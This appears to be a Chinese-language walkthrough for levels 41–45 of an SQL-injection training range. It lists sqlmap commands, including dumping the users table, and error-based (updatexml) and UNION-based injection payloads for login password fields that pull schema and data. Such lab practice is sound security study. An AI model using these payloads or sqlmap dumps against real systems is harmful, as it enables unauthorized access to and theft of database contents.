第41关

这关我们使用工具sqlmap练习一下（这里如果用本机的回环地址访问靶场的话只能在你的本机访问，因为我们是在虚拟机上进行扫描，所以不能使用127.0.0.1访问）

进入虚拟机kali，打开终端

查库

sqlmap -u 网址 -- current-db

查表

-D 库名 --tables

查数据

-D security -T users --dump

第42关

进入后登录页面然后在密码框进行注入

查数据库

'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

查表名

'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

查列

'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) -- aaa

第43关

还是在登录页面的密码框注入

查数据库

') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

查表

') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

查列

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第44关

这关也是在登录页面的密码框里进行输入

查库

1' union select 1,database(),3 #

查表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

查列

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

第45关

登录页面密码框里进行输入

查库

1') union select 1,database(),3 #

查表

1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

查列

1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #